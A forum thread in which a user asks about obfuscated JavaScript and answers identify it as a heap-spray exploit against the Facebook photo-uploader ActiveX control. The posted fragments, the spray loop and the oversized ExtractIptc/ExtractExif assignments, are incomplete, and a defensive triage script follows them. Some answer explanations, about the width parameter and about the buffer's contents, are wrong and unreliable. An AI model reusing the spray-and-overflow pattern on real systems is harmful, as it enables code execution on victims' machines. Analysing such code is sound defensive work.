I do not understand this code snippet:
    function ms(){
        var plc=unescape('".
        unescape( '\x43\x43\x43\x43\n.............\xEF'. $URL).CollectGarbage();
        if (mf)return(0);
        mf=1;
        var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
        var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
        for(i=0;i<hb;i++) m[i]=ss+plc;
        hav();
        return(1);
    }
In the above function I can't seem to figure out the variable types, or figure out what it's doing with the hsta variable, and what it's assigning to it:
    var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
    var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
    for(i=0;i<hb;i++)m[i]=ss+plc;
I also can't figure out this function:
    function fb(){
        try {
            var obj=null;
            obj=cobj('{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}');
            if(obj){
                ms();
                var buf = addr(0x0c0c0c0c);
                while (buf.length < 400) buf += buf;
                buf = buf.substring(0,400);
                obj.ExtractIptc = buf;
                obj.ExtractExif = buf;
            }
        } catch(e){}
        return 0;
    }
What does the following code mean?
    cobj('{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}')
What kind of variable is this?
    var buf = addr(0x0c0c0c0c);
    buf = buf.substring(0,400);
    obj.ExtractIptc = buf;
    obj.ExtractExif = buf;
Most importantly, what is that code snippet trying to do?
Here are some more functions:
    function hex(num,width){
        var digits='0123456789ABCDEF';
        var hex=digits.substr(num&0xF,1);
        while(num>0xF){
            num=num>>>4;
            hex=digits.substr(num&0xF,1)+hex;
        }
        var width=(width?width:0);
        while(hex.length<width)hex='0'+hex;
        return hex;
    }
    function addr(addr){
        return unescape('%u'+hex(addr&0xFFFF,4)+'%u'+hex((addr>>16)&0xFFFF,4));
    }
Any guidance would be appreciated.
It's a JavaScript snippet trying to exploit a security vulnerability related to Facebook, more specifically to its image uploader client side ActiveX control.
The cobj part tries to create an object of ClassID {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0} which happens to be an ActiveX photo uploader control. The ExtractIptc and ExtractExif functions belong to that specific ActiveX control.
The core of the code is really memory address manipulation, shifting, using masks to separate high and low bits. For example, hex((addr>>16)&0xFFFF,4) takes an address, shifts it 16 bits to the right, clears up the lower part and converts it to a hex number. To actually understand most of this code, you should have the right debugging tools.
Googling the {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0} ClassID gave some interesting results you should look into:
http://www.kb.cert.org/vuls/id/776931
http://seclists.org/fulldisclosure/2008/Feb/0023.html
http://securitytracker.com/alerts/2008/Feb/1019297.html
Please note, this is not PHP. It's JavaScript.
More details...
cobj is probably translated into a CreateObject() call. Every registered ActiveX control has its own Class ID, and they have the form {0000000000-0000-0000-0000-000000000000}. When you want to refer to the registered library, and create an instance of it, you can use either its name or its Class ID.
The ActiveX control itself should be an .OCX or .DLL file on your computer. If you can find this file and debug it, you'll get most specific details about the ExtractIptc and ExtractExif functions. Again, those two functions seem to have vulnerabilities when called in a specific way, and this is what that script is trying to exploit.
The var hsta=0x0c0c0c0c part defines a variable hsta, equal to the hexadecimal number 0c0c0c0c. It's the same as writing var hsta = 202116108. In computer engineering, it's easier to deal with hexadecimal addresses than decimal numbers since addresses and data inside the computer's memory are binary and can be directly represented as a hex number. More details about hexadecimal there: http://en.wikipedia.org/wiki/Hexadecimal.
The variable name hsta seems to be in Hungarian notation (first letter represents the variable type - h for hex). I would therefore assume it means hexadecimal start address (hsta). Following the same train of thought, my guess would be that pl means payload and plc means payload code.
The payload code is the code the computer will execute if the exploit was successful, and it's what you see at the beginning of the script (\x43\x43\x43\x43\n....\xEF). It's encoded as shell code for a particular CPU architecture and operating system. That means code that's already compiled, standalone, and can be piped to the CPU directly. If you decode this, you'll probably find something close to machine code. It's probably nothing positive.
The hex(num,width) function converts a decimal number to its hexadecimal form. I've tested the function separately, and it returned 3E8 when feeding it 1000. The width variable is simply used to exit the script if the resulting hexadecimal number is bigger than specified.
About this part:
    var buf = addr(0x0c0c0c0c);
    buf = buf.substring(0,400);
    obj.ExtractIptc = buf;
    obj.ExtractExif = buf;
The buf variable is a buffer. A buffer is nothing more than data in memory. It can be interfaced as a string, as shown in this code. My guess is that a buffer of 400 bytes is created from whatever content is in memory at 0x0c0c0c0c, and then fed into two functions.
There are several function definitions missing in here. Namely, the hav() function.
I fixed the formatting as much as I could, but there still seem to be chunks missing. At least, I'm seeing syntax errors, uninitialized variables, etc.
If this is actual working code please edit your question and (using the "code" button "101/010" or just indenting 4 spaces rather than quoting with the '"' button) post the actual code so that what we see matches what you are seeing. EDIT: DON'T TRY TO RUN THIS CODE! It's probably malicious.
If it isn't working code, there's your answer: it doesn't work, so trying to figure out how it works doesn't make sense.
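As an added example (not part of the original posts, and not code from the control's vendor), here is a defender-side triage of a script like the one in the question: it scans the text for the indicators the answers point out and decodes %u escapes into bytes, without evaluating anything. The indicator names, the flagged rule and the sample lines are choices made for this example.

```javascript
// Added example: static triage only. The sample is inert text and is never evaluated.
const INDICATORS = {
  clsid: /\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}/g, // ActiveX class ID literal
  unescapeCall: /\bunescape\s*\(/g,                    // strings built from escapes
  repeatedByteAddress: /\b0x([0-9A-Fa-f]{2})\1{3}\b/g, // 32-bit constant of one repeated byte
  stringDoubling: /\b(\w+)\s*\+=\s*\1\b/g,             // "buf += buf" style growth
  collectGarbage: /\bCollectGarbage\s*\(/g,            // forced garbage collection
};

// Constructed sample: lines copied from the question, held as plain text.
const SAMPLE = [
  "var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);",
  "obj=cobj('{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}');",
  "var buf = addr(0x0c0c0c0c);",
  "while (buf.length < 400) buf += buf;",
  "return unescape('%u'+hex(addr&0xFFFF,4)+'%u'+hex((addr>>16)&0xFFFF,4));",
].join("\n");

// Collect every match per indicator, then flag scripts that reference a control
// by class ID and also show an address-like constant or string doubling.
function triage(source) {
  const hits = {};
  for (const [name, re] of Object.entries(INDICATORS)) {
    hits[name] = [...source.matchAll(re)].map((m) => m[0]);
  }
  const flagged = hits.clsid.length > 0 &&
    (hits.repeatedByteAddress.length > 0 || hits.stringDoubling.length > 0);
  return { hits, flagged };
}

// Decode %uXXXX escapes into the bytes they occupy in a UTF-16LE string
// (low byte of each 16-bit unit first), without calling unescape().
function percentUToBytes(text) {
  const bytes = [];
  for (const m of text.matchAll(/%u([0-9A-Fa-f]{4})/g)) {
    const unit = parseInt(m[1], 16);
    bytes.push(unit & 0xff, unit >> 8);
  }
  return bytes;
}

console.log(triage(SAMPLE));
// '%u0C0C%u0C0C' is the escape text addr(0x0c0c0c0c) assembles from hex().
console.log(percentUToBytes("%u0C0C%u0C0C").map((b) => b.toString(16)));
```

The extracted class ID is the value to look up in advisories such as the ones linked above, and the decoded bytes show how a string built from %u escapes is laid out in memory.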